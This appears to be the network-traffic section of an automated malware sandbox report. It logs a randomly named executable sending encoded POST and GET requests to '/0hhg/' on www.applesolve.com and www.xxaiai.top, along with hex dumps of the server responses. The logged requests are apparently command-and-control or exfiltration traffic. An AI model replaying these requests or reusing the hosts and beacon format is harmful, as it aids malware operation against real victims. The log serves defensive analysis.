                                                                                                    Data Raw: 35 34 36 33 0d 0a f4 c2 1b a2 a8 aa fd 70 45 24 e9 ac 1e 02 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff cc d4 fa f3 a4 6a 0e 77 04 9e 96 c9 04 80 48 6a b1 4d 8d dc 59 3d bd 64 ab 38 99 cd f2 a8 1e c9 47 0a 36 08 a0 01 50 a4 cc f0 6f e7 fb ff 5f 55 fb be 26 cf 71 d1 df a5 27 58 b3 00 84 48 80 b2 ad 17 bc 33 9b 66 5e f2 86 ac 03 82 20 85 31 49 f0 11 54 f0 d3 fa a7 aa da a2 ff 45 97 fe 7f df d4 ec c9 8d a9 f2 e9 5d a5 dc d1 58 12 dc 14 3a 87 98 ee bd ef 15 7f e6 4f 31 00 58 0c 08 16 00 c8 02 24 55 20 6c 60 ba ef de f7 de ff f3 67 06 44 92 16 04 15 98 56 4b 6e 24 a8 44 4a 4b 39 90 82 ce b1 a8 4d 92 9c 72 97 ca 90 29 6d c8 b6 2c e7 dc 74 1f 74 82 43 08 e5 1e 57 3a 2e 9a ca 8f f1 b3 cf ed ee 47 ce 40 44 40 50 5f 6d 19 9a d6 4b f7 8f 69 83 2c 04 08 d0 82 a4 8f a1 e5 7f bb 2f ed 4e 14 70 e1 88 20 de 3d 86 6a fb f7 6e 04 44 8d d4 e0 23 cb 50 b5 e9 d9 eb 5b 63 10 20 8e c5 b5 00 c5 c7 08 70 ae af 60 53 68 d5 e9 ab 9e 7c 4b ad e2 5f 3e d0 6b 4a ce 6f 31 5c 26 ff 45 1e c3 96 ee fb dd c6 4d d0 d0 e2 96 32 4b 8e a2 [TRUNCATED]
                                                                                                    Data Ascii: 5463pE$)/&>yjwHjMY=d8G6Po_U&q'XH3f^ 1ITE]X:O1X$U l`gDVKn$DJK9Mr)m,ttCW:.G@D@P_mKi,/Np =jnD#P[c p`Sh|K_>kJo1\&EM2Kc-z#;zE})?*CZ*>6f>zdPx}@Dd|? O>I.4*5As*3y-4w>J:'gXu^i/~(sr9XuDQ6_aN 7Q#G}{Ay"ZI2{yX)'dG:X]7p[ln<S4g%w^a7/nD"E6\d9e@sz/F>o[2+#-.!d2C`yo| dsh#ZDFilA`+b?0L13H1Sl7Z7<x>Q<m<z/Ac5`O'u#SxiBY`:Qv|2DKP6vE-CKXo*|:,)B
                                                                                                    May 2, 2024 08:26:40.109991074 CEST1289INData Raw: 60 f8 b5 85 06 df 41 00 f0 6f a4 44 05 01 62 e6 b6 11 5e ab f5 8a 60 18 d9 7e 66 4a 10 cf dc 80 bb 59 d0 00 b2 d0 ef 9d 0f c1 ed 76 eb ee c2 fd 14 13 f9 7e dd 1d f3 bd 0c e5 21 0a f1 58 82 47 5a 2b 68 68 9e f9 db 43 47 c8 e8 ae ab 2e 17 e5 ae ab
                                                                                                    Data Ascii: `AoDb^`~fJYv~!XGZ+hhCG.zjL]%I5\G~s'Z(~uuULv]U/j]DgB^uF.jot6 nlkiA[\O}GvcEo?{D7eP8yT
                                                                                                    May 2, 2024 08:26:40.110007048 CEST1289INData Raw: a5 4f c1 4d e3 c8 55 c2 07 17 6a fc 00 83 67 60 6f 94 d4 8f 1f a1 bc 0d fa 3d 7f 63 74 60 b7 d8 18 24 df 7f 65 5f 4d 61 82 61 9f 87 53 83 9a df 82 f6 ec 7b d1 e9 d0 b1 b7 a0 03 38 54 8a fd 82 ea 88 41 96 40 3e 61 87 03 94 ca ae 24 fb 97 49 72 43
                                                                                                    Data Ascii: OMUjg`o=ct`$e_MaaS{8TA@>a$IrCbXv#gr]R^ao&&zL@"L8arH!3vX|vX~KvX}+vX]3e@sX[~JiTbS`r*up*yy&jqt67SeJ2qR4K
                                                                                                    May 2, 2024 08:26:40.110022068 CEST1289INData Raw: 44 a9 14 21 c1 c5 9a 01 0e 87 09 a6 69 0a 3a 83 97 01 89 f0 8f d2 52 42 4c 62 9b 60 27 65 1a a9 4d 17 7a 22 bf a4 a8 0e c5 30 d3 76 39 7e 52 1a 4a 1a 8c 34 72 8e ed 41 fa 96 d9 28 09 1f 9d 97 d1 e4 3c 78 80 e8 4b fe dc 2d 8d c2 8a 07 c3 7d af 89
                                                                                                    Data Ascii: D!i:RBLb`'eMz"0v9~RJ4rA(<xK-}R tx*w(Io=?%;+D)?~ODsW&&J4K K^Rw~G8:U'^|kCl7c\M|4;H-y.L'pr]|M
                                                                                                    May 2, 2024 08:26:40.110034943 CEST1289INData Raw: 10 df 98 c9 cc 91 b5 1d 48 1a 89 ee 5d 0e e7 39 61 45 1a 59 a6 5c f6 2a 93 2f 83 83 cd e6 31 85 3b 54 45 97 47 12 0d 5a 35 e3 26 c6 c9 3b c6 ab 59 c8 79 d3 b4 50 bd 5a 8e 79 b7 92 ab a9 47 dd dc 6c a6 3c f7 2b 0f 77 30 aa 5a 14 00 ae 14 3a 88 20
                                                                                                    Data Ascii: H]9aEY\*/1;TEGZ5&;YyPZyGl<+w0Z: ^7S``lGc;Rqex<{qMl^>t<Z=R79Jv}TQ+Z+yN)O9$5f`ura:z~yRYb_8?[W<2GB^+
                                                                                                    May 2, 2024 08:26:40.110047102 CEST1289INData Raw: 58 f1 8b 37 02 2f 9f 90 fb 96 25 7e 4a 0c fe 29 d1 56 4f 09 d5 3c 29 83 32 2c 06 17 63 c5 ab 01 61 b6 45 b2 7a ef 72 05 29 3d f4 80 d8 1a a5 b2 78 3a 8d 89 c8 bf 80 7c cb 04 84 a7 da e0 9f 6a 6d f5 54 53 cd 53 6c 50 42 4d 76 bd d4 05 54 dd bb cc
                                                                                                    Data Ascii: X7/%~J)VO<)2,caEzr)=x:|jmTSSlPBMvTHJMK#Jyv<^@\B8/}8F*:Z-k]|Di) /1Cz|i51/ec.JX}5"!1"b.b!Mq.`\rNkc0F.C
                                                                                                    May 2, 2024 08:26:40.110059977 CEST1289INData Raw: c6 b5 39 71 26 40 c0 88 a4 97 49 85 0d 89 f5 59 1b c8 da 71 16 7d 04 aa 24 6c 98 63 5c d5 43 d2 54 d5 fe d2 e1 0b a3 2a aa c9 54 a2 7b b9 29 d2 05 36 37 50 2b ce 4e ae cb 2f 03 82 2e 60 de 0d 4e 05 d8 e5 a8 b0 fe b2 15 75 b5 99 1c e0 b5 0a 61 b1
                                                                                                    Data Ascii: 9q&@IYq}$lc\CT*T{)67P+N/.`NuaZ@1`,$#j:PemAnn#]'2F68G(!nZMZL/CK=_ %{0J0q>iXDvjU-U;7~f|0o>Sh|-z!>D
                                                                                                    May 2, 2024 08:26:40.110070944 CEST1289INData Raw: 36 a7 33 85 a4 e4 1b f2 c4 66 68 6a 44 5a 48 b2 d6 62 2b 54 60 68 30 29 82 7e c3 8a 0b 3a 65 50 32 95 43 2c 87 6f a1 73 38 b2 c0 b3 ab 05 e4 9a 26 f6 b5 12 9c 5b 30 ca b2 04 86 fd 18 70 bb 52 12 dc c1 e8 a4 26 ea d9 ef cd 44 44 91 b5 10 1f 3b 8a
                                                                                                    Data Ascii: 63fhjDZHb+T`h0)~:eP2C,os8&[0pR&DD;@xA)THZkaKlhkJF!aG1 1:QM-U1{@:qRSzDr:geqR3zDE:K.`]6r."rW0.;^gK@n]FE:K`Z
                                                                                                    May 2, 2024 08:26:40.110083103 CEST1289INData Raw: 0c 4d 52 2f db c2 81 d3 7b 71 39 12 a7 65 00 2c 03 81 86 3e f8 c0 38 b5 fc c9 a6 10 72 38 67 d5 46 dc 90 cd 78 6e b4 3a 31 71 a2 e2 a2 0c 45 22 95 f3 60 5f f6 59 99 e8 24 3f a0 b2 e8 b8 19 83 35 fe 5c a5 81 69 a6 d0 ab 70 76 8c e5 9b 48 8c 1e fa
                                                                                                    Data Ascii: MR/{q9e,>8r8gFxn:1qE"`_Y$?5\ipvHh)Z=kV``"787>S$dgkfG'r5P5@9][^>S?ldl@v"T_YO?x^ a~0P>5[zs5^@8n?|#,^
                                                                                                    May 2, 2024 08:26:40.110137939 CEST1289INData Raw: 5e 48 13 49 de c6 40 e4 94 51 5a 8e ee 32 90 59 a5 0f 03 11 ef 08 27 2a 83 64 3a 54 f0 7d 53 0e a8 af 40 69 97 57 4b 66 46 0f b7 59 26 3b 1b 32 71 9d 6d b9 a1 c3 b6 86 60 f7 eb 60 46 24 70 11 34 d4 88 6c 73 20 cb 35 b0 46 a9 34 34 f1 67 0a ad b4
                                                                                                    Data Ascii: ^HI@QZ2Y'*d:T}S@iWKfFY&;2qm``F$p4ls 5F44g{0J&]I}+.6%<C"Evs3"JA(Q>cLV?Vw=}J*6Ji_Zn3t k 2Prr|hoX<7tqg6$uz"+,9RGa\R\"g
                                                                                                    May 2, 2024 08:26:40.295114040 CEST1289INData Raw: 02 e3 75 ff 64 e7 01 a7 c9 bb 65 3e 0c 48 4f a6 25 e2 42 22 ce 13 fe cd 60 8a 21 c6 29 e2 b4 5a 01 8f 85 dd 38 62 a6 5c 81 3c bf 55 18 24 65 16 49 cb f7 ba 62 31 f8 ce 95 59 81 39 6d 4a 22 2e 0d d2 9f b7 d5 fd 21 ed 3f 07 16 1b 48 ae e3 73 5a 22
                                                                                                    Data Ascii: ude>HO%B"`!)Z8b\<U$eIb1Y9mJ".!?HsZ".8b".)Fh]{8c{q+\I$jk9`~$'*db~JAhesH,3gQS9C~C986P<LeD_<5]x/Ic%*d4_


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    27192.168.2.449764188.116.38.15580916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:42.273371935 CEST10807OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.applesolve.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.applesolve.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.applesolve.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 69 6d 74 51 61 45 4e 38 64 4a 7a 2f 67 6b 61 79 6f 53 34 50 47 32 65 65 64 49 52 48 31 59 6e 4b 53 35 66 30 79 2b 2b 62 54 58 68 53 45 46 67 50 51 66 59 31 6a 33 45 63 41 62 4c 6b 67 36 32 71 7a 49 2b 68 47 53 4c 53 75 2f 74 45 4d 4d 41 52 51 62 64 2f 4f 2b 69 43 67 72 6d 46 57 48 55 64 6c 2b 55 48 33 2f 62 46 6e 4c 72 2f 45 73 4b 31 34 6b 7a 6d 63 6b 54 5a 67 38 6c 6b 56 66 4e 77 43 42 65 32 6d 41 7a 43 6c 69 68 51 53 44 44 69 31 4d 38 66 52 73 66 72 33 41 41 4a 59 4f 71 67 34 37 77 7a 36 71 37 48 4e 76 36 63 75 42 57 75 6e 68 6a 4f 6c 7a 61 63 53 4b 32 36 64 68 49 56 4a 38 74 4e 50 39 47 52 76 43 57 50 33 65 4b 64 59 41 74 6b 4e 75 4f 46 53 5a 6e 67 62 43 54 6a 52 4a 4d 48 44 6e 30 73 64 78 39 41 62 4a 78 43 47 74 67 76 6f 4c 4e 53 49 43 70 79 63 30 42 73 65 51 6b 66 7a 58 71 72 4a 6a 5a 36 6e 55 67 51 58 31 75 72 58 68 48 52 38 66 66 7a 6d 72 76 39 31 6e 63 78 32 77 30 30 54 58 43 63 68 62 6d 39 41 37 49 49 67 66 4e 2f 53 77 56 7a 67 63 54 64 48 75 45 59 6d 43 6a 44 75 [TRUNCATED]
                                                                                                    Data Ascii: ABqDW6A8=imtQaEN8dJz/gkayoS4PG2eedIRH1YnKS5f0y++bTXhSEFgPQfY1j3EcAbLkg62qzI+hGSLSu/tEMMARQbd/O+iCgrmFWHUdl+UH3/bFnLr/EsK14kzmckTZg8lkVfNwCBe2mAzClihQSDDi1M8fRsfr3AAJYOqg47wz6q7HNv6cuBWunhjOlzacSK26dhIVJ8tNP9GRvCWP3eKdYAtkNuOFSZngbCTjRJMHDn0sdx9AbJxCGtgvoLNSICpyc0BseQkfzXqrJjZ6nUgQX1urXhHR8ffzmrv91ncx2w00TXCchbm9A7IIgfN/SwVzgcTdHuEYmCjDulKodIVxbUWnyGxFcRK4IE6lLI8lDUqVZMqfkiW4UEttXy5kjLEBLHWk2OrECGxdAgYf5ux3zmjzxKJ0t4YbMPkzisD6DGBjjRiMoyJjG3o7alv7XdQ1O1ISQls/nd7C2I9DmZ8DIfb79tVLOpY/5Ks5hiZm84raHkaQtyIllsb4oyMrSaXaczNc2dKulzv9icatVu16rEjx6b5Yk/RfgnJigswBv8n7t2I+Sq9hAGIGudCS+0XEnWhXnKZwKEBb4RAcxpb2VyUtVk/Pnm4pViRM3UpeI6S2eV6UWlAEVTECFQ5ntQ6VAM6qQDMDIzc1KH0h+nxJt2S90fT1d6PPwjFTsdyf+eVEMcvyjNBFwy5MQEG+FhAFPqKNWbj764IUVBo/QuaR5pZScaQQtyTll3eqjyGq1f7zcfpdIR7X2j3/wRZ9KzzP6AHsVvHQI2skPfxpyQlQV7C1/M5rBeL0LYcdIc9M7gw0ry6+tNR/Ags+4ddwkQ0ly6ZxW5wOMu/ke2c8IjALdrkCBmDfdkb3t8echmqQIEtVUlnHkVbq15iXy1FY158eqRM03I9T7Kd0TtX+ycu8p/9pU8STBEeiS56BcM2Qan2YNLVNiOCD7uurMVLxdkHob+pwooqSsudxVJYqxtMhWj6E2J48xg0UtTjlWFOhcbLkMrP [TRUNCATED]
                                                                                                    May 2, 2024 08:26:42.849715948 CEST1289INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    x-powered-by: PHP/8.3.6
                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    link: <https://applesolve.com/wp-json/>; rel="https://api.w.org/"
                                                                                                    transfer-encoding: chunked
                                                                                                    content-encoding: br
                                                                                                    vary: Accept-Encoding
                                                                                                    date: Thu, 02 May 2024 06:26:41 GMT
                                                                                                    server: LiteSpeed
                                                                                                    Data Raw: 35 34 36 33 0d 0a f4 c2 1b a2 a8 aa fd 70 45 24 e9 ac 1e 02 1a 29 0b e7 ef 2f 02 e3 26 3e d6 79 be ff cc d4 fa f3 a4 6a 0e 77 04 9e 96 c9 04 80 48 6a b1 4d 8d dc 59 3d bd 64 ab 38 99 cd f2 a8 1e c9 47 0a 36 08 a0 01 50 a4 cc f0 6f e7 fb ff 5f 55 fb be 26 cf 71 d1 df a5 27 58 b3 00 84 48 80 b2 ad 17 bc 33 9b 66 5e f2 86 ac 03 82 20 85 31 49 f0 11 54 f0 d3 fa a7 aa da a2 ff 45 97 fe 7f df d4 ec c9 8d a9 f2 e9 5d a5 dc d1 58 12 dc 14 3a 87 98 ee bd ef 15 7f e6 4f 31 00 58 0c 08 16 00 c8 02 24 55 20 6c 60 ba ef de f7 de ff f3 67 06 44 92 16 04 15 98 56 4b 6e 24 a8 44 4a 4b 39 90 82 ce b1 a8 4d 92 9c 72 97 ca 90 29 6d c8 b6 2c e7 dc 74 1f 74 82 43 08 e5 1e 57 3a 2e 9a ca 8f f1 b3 cf ed ee 47 ce 40 44 40 50 5f 6d 19 9a d6 4b f7 8f 69 83 2c 04 08 d0 82 a4 8f a1 e5 7f bb 2f ed 4e 14 70 e1 88 20 de 3d 86 6a fb f7 6e 04 44 8d d4 e0 23 cb 50 b5 e9 d9 eb 5b 63 10 20 8e c5 b5 00 c5 c7 08 70 ae af 60 53 68 d5 e9 ab 9e 7c 4b ad e2 5f 3e d0 6b 4a ce 6f 31 5c 26 ff 45 1e c3 96 ee fb dd c6 4d d0 d0 e2 96 32 4b 8e a2 [TRUNCATED]
                                                                                                    Data Ascii: 5463pE$)/&>yjwHjMY=d8G6Po_U&q'XH3f^ 1ITE]X:O1X$U l`gDVKn$DJK9Mr)m,ttCW:.G@D@P_mKi,/Np =jnD#P[c p`Sh|K_>kJo1\&EM2Kc-z#;zE})?*CZ*>6f>zdPx}@Dd|? O>I.4*5As*3y-4w>J:'gXu^i/~(sr9XuDQ6_aN 7Q#G}{Ay"ZI2{yX)'dG:X]7p[ln<S4g%w^a7/nD"E6\d9e@sz/F>o[2+#-.!d2C`yo| dsh#ZDFilA`+b?0L13H1Sl7Z7<x>Q<m<z/Ac5`O'u#SxiBY`:Qv|2DKP6vE-CKXo*|:,)B
                                                                                                    May 2, 2024 08:26:42.849807978 CEST1289INData Raw: 60 f8 b5 85 06 df 41 00 f0 6f a4 44 05 01 62 e6 b6 11 5e ab f5 8a 60 18 d9 7e 66 4a 10 cf dc 80 bb 59 d0 00 b2 d0 ef 9d 0f c1 ed 76 eb ee c2 fd 14 13 f9 7e dd 1d f3 bd 0c e5 21 0a f1 58 82 47 5a 2b 68 68 9e f9 db 43 47 c8 e8 ae ab 2e 17 e5 ae ab
                                                                                                    Data Ascii: `AoDb^`~fJYv~!XGZ+hhCG.zjL]%I5\G~s'Z(~uuULv]U/j]DgB^uF.jot6 nlkiA[\O}GvcEo?{D7eP8yT
                                                                                                    May 2, 2024 08:26:42.849819899 CEST1289INData Raw: a5 4f c1 4d e3 c8 55 c2 07 17 6a fc 00 83 67 60 6f 94 d4 8f 1f a1 bc 0d fa 3d 7f 63 74 60 b7 d8 18 24 df 7f 65 5f 4d 61 82 61 9f 87 53 83 9a df 82 f6 ec 7b d1 e9 d0 b1 b7 a0 03 38 54 8a fd 82 ea 88 41 96 40 3e 61 87 03 94 ca ae 24 fb 97 49 72 43
                                                                                                    Data Ascii: OMUjg`o=ct`$e_MaaS{8TA@>a$IrCbXv#gr]R^ao&&zL@"L8arH!3vX|vX~KvX}+vX]3e@sX[~JiTbS`r*up*yy&jqt67SeJ2qR4K
                                                                                                    May 2, 2024 08:26:42.849832058 CEST1289INData Raw: 44 a9 14 21 c1 c5 9a 01 0e 87 09 a6 69 0a 3a 83 97 01 89 f0 8f d2 52 42 4c 62 9b 60 27 65 1a a9 4d 17 7a 22 bf a4 a8 0e c5 30 d3 76 39 7e 52 1a 4a 1a 8c 34 72 8e ed 41 fa 96 d9 28 09 1f 9d 97 d1 e4 3c 78 80 e8 4b fe dc 2d 8d c2 8a 07 c3 7d af 89
                                                                                                    Data Ascii: D!i:RBLb`'eMz"0v9~RJ4rA(<xK-}R tx*w(Io=?%;+D)?~ODsW&&J4K K^Rw~G8:U'^|kCl7c\M|4;H-y.L'pr]|M
                                                                                                    May 2, 2024 08:26:42.849843025 CEST1289INData Raw: 10 df 98 c9 cc 91 b5 1d 48 1a 89 ee 5d 0e e7 39 61 45 1a 59 a6 5c f6 2a 93 2f 83 83 cd e6 31 85 3b 54 45 97 47 12 0d 5a 35 e3 26 c6 c9 3b c6 ab 59 c8 79 d3 b4 50 bd 5a 8e 79 b7 92 ab a9 47 dd dc 6c a6 3c f7 2b 0f 77 30 aa 5a 14 00 ae 14 3a 88 20
                                                                                                    Data Ascii: H]9aEY\*/1;TEGZ5&;YyPZyGl<+w0Z: ^7S``lGc;Rqex<{qMl^>t<Z=R79Jv}TQ+Z+yN)O9$5f`ura:z~yRYb_8?[W<2GB^+
                                                                                                    May 2, 2024 08:26:42.849987030 CEST1289INData Raw: 58 f1 8b 37 02 2f 9f 90 fb 96 25 7e 4a 0c fe 29 d1 56 4f 09 d5 3c 29 83 32 2c 06 17 63 c5 ab 01 61 b6 45 b2 7a ef 72 05 29 3d f4 80 d8 1a a5 b2 78 3a 8d 89 c8 bf 80 7c cb 04 84 a7 da e0 9f 6a 6d f5 54 53 cd 53 6c 50 42 4d 76 bd d4 05 54 dd bb cc
                                                                                                    Data Ascii: X7/%~J)VO<)2,caEzr)=x:|jmTSSlPBMvTHJMK#Jyv<^@\B8/}8F*:Z-k]|Di) /1Cz|i51/ec.JX}5"!1"b.b!Mq.`\rNkc0F.C
                                                                                                    May 2, 2024 08:26:42.849997997 CEST1289INData Raw: c6 b5 39 71 26 40 c0 88 a4 97 49 85 0d 89 f5 59 1b c8 da 71 16 7d 04 aa 24 6c 98 63 5c d5 43 d2 54 d5 fe d2 e1 0b a3 2a aa c9 54 a2 7b b9 29 d2 05 36 37 50 2b ce 4e ae cb 2f 03 82 2e 60 de 0d 4e 05 d8 e5 a8 b0 fe b2 15 75 b5 99 1c e0 b5 0a 61 b1
                                                                                                    Data Ascii: 9q&@IYq}$lc\CT*T{)67P+N/.`NuaZ@1`,$#j:PemAnn#]'2F68G(!nZMZL/CK=_ %{0J0q>iXDvjU-U;7~f|0o>Sh|-z!>D
                                                                                                    May 2, 2024 08:26:42.850058079 CEST1289INData Raw: 36 a7 33 85 a4 e4 1b f2 c4 66 68 6a 44 5a 48 b2 d6 62 2b 54 60 68 30 29 82 7e c3 8a 0b 3a 65 50 32 95 43 2c 87 6f a1 73 38 b2 c0 b3 ab 05 e4 9a 26 f6 b5 12 9c 5b 30 ca b2 04 86 fd 18 70 bb 52 12 dc c1 e8 a4 26 ea d9 ef cd 44 44 91 b5 10 1f 3b 8a
                                                                                                    Data Ascii: 63fhjDZHb+T`h0)~:eP2C,os8&[0pR&DD;@xA)THZkaKlhkJF!aG1 1:QM-U1{@:qRSzDr:geqR3zDE:K.`]6r."rW0.;^gK@n]FE:K`Z
                                                                                                    May 2, 2024 08:26:42.850070000 CEST1289INData Raw: 0c 4d 52 2f db c2 81 d3 7b 71 39 12 a7 65 00 2c 03 81 86 3e f8 c0 38 b5 fc c9 a6 10 72 38 67 d5 46 dc 90 cd 78 6e b4 3a 31 71 a2 e2 a2 0c 45 22 95 f3 60 5f f6 59 99 e8 24 3f a0 b2 e8 b8 19 83 35 fe 5c a5 81 69 a6 d0 ab 70 76 8c e5 9b 48 8c 1e fa
                                                                                                    Data Ascii: MR/{q9e,>8r8gFxn:1qE"`_Y$?5\ipvHh)Z=kV``"787>S$dgkfG'r5P5@9][^>S?ldl@v"T_YO?x^ a~0P>5[zs5^@8n?|#,^
                                                                                                    May 2, 2024 08:26:42.850115061 CEST1289INData Raw: 5e 48 13 49 de c6 40 e4 94 51 5a 8e ee 32 90 59 a5 0f 03 11 ef 08 27 2a 83 64 3a 54 f0 7d 53 0e a8 af 40 69 97 57 4b 66 46 0f b7 59 26 3b 1b 32 71 9d 6d b9 a1 c3 b6 86 60 f7 eb 60 46 24 70 11 34 d4 88 6c 73 20 cb 35 b0 46 a9 34 34 f1 67 0a ad b4
                                                                                                    Data Ascii: ^HI@QZ2Y'*d:T}S@iWKfFY&;2qm``F$p4ls 5F44g{0J&]I}+.6%<C"Evs3"JA(Q>cLV?Vw=}J*6Ji_Zn3t k 2Prr|hoX<7tqg6$uz"+,9RGa\R\"g
                                                                                                    May 2, 2024 08:26:43.037242889 CEST1289INData Raw: 02 e3 75 ff 64 e7 01 a7 c9 bb 65 3e 0c 48 4f a6 25 e2 42 22 ce 13 fe cd 60 8a 21 c6 29 e2 b4 5a 01 8f 85 dd 38 62 a6 5c 81 3c bf 55 18 24 65 16 49 cb f7 ba 62 31 f8 ce 95 59 81 39 6d 4a 22 2e 0d d2 9f b7 d5 fd 21 ed 3f 07 16 1b 48 ae e3 73 5a 22
                                                                                                    Data Ascii: ude>HO%B"`!)Z8b\<U$eIb1Y9mJ".!?HsZ".8b".)Fh]{8c{q+\I$jk9`~$'*db~JAhesH,3gQS9C~C986P<LeD_<5]x/Ic%*d4_


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    28192.168.2.449765188.116.38.15580916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:44.991528034 CEST438OUTGET /0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ HTTP/1.1
                                                                                                    Host: www.applesolve.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    May 2, 2024 08:26:45.416357994 CEST499INHTTP/1.1 301 Moved Permanently
                                                                                                    Connection: close
                                                                                                    x-powered-by: PHP/8.3.6
                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    x-redirect-by: WordPress
                                                                                                    location: http://applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ
                                                                                                    content-length: 0
                                                                                                    date: Thu, 02 May 2024 06:26:44 GMT
                                                                                                    server: LiteSpeed


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    29192.168.2.449766108.186.8.15880916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:26:52.319693089 CEST693OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.xxaiai.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.xxaiai.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.xxaiai.top/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 31 4e 36 6b 65 32 69 63 53 79 35 71 51 6a 69 62 76 49 50 36 64 78 45 64 71 6e 6e 69 43 52 75 51 53 44 74 4f 2f 6a 70 37 68 4d 76 4d 33 64 34 32 6d 52 4a 6a 50 79 6b 45 30 77 72 35 4c 56 55 68 64 51 31 46 32 44 4e 45 34 4b 65 31 75 39 78 57 53 78 52 70 75 4a 52 72 72 2f 37 32 59 44 41 30 66 68 36 61 74 53 45 72 6c 72 6c 34 6e 65 39 55 79 71 77 32 50 48 33 55 62 35 35 6f 2f 68 65 43 6c 71 67 6e 41 36 49 39 61 57 51 6d 76 72 7a 63 57 33 34 70 37 54 2b 38 72 6e 4e 6c 44 53 75 47 4b 4b 75 51 38 6d 6a 49 67 46 41 52 62 78 48 4c 6d 78 4e 72 38 7a 51 56 32 7a 63 45 4b 39 46 70 51 41 3d 3d
                                                                                                    Data Ascii: ABqDW6A8=1N6ke2icSy5qQjibvIP6dxEdqnniCRuQSDtO/jp7hMvM3d42mRJjPykE0wr5LVUhdQ1F2DNE4Ke1u9xWSxRpuJRrr/72YDA0fh6atSErlrl4ne9Uyqw2PH3Ub55o/heClqgnA6I9aWQmvrzcW34p7T+8rnNlDSuGKKuQ8mjIgFARbxHLmxNr8zQV2zcEK9FpQA==
                                                                                                    May 2, 2024 08:26:52.857659101 CEST693OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.xxaiai.top
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.xxaiai.top
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 205
                                                                                                    Referer: http://www.xxaiai.top/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
